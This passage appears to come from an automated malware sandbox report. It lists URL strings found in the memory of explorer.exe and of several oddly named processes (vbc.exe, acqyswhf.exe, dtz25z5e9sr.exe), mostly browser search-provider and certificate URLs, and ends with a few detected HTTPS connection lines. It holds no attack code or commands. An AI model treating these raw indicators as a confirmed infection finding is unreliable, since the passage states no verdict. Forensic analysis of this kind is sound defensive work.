          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
          Source: explorer.exe, 00000008.00000000.2185855898.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2181107481.0000000001CD0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2380577544.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000000.2162676432.0000000000C99000.00000002.00020000.sdmp, dtz25z5e9sr.exe, 00000006.00000000.2164218683.00000000004C9000.00000002.00020000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2181625613.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2196077802.000000000B320000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2191369780.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2191235298.0000000008471000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerp
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49165 version: TLS 1.2
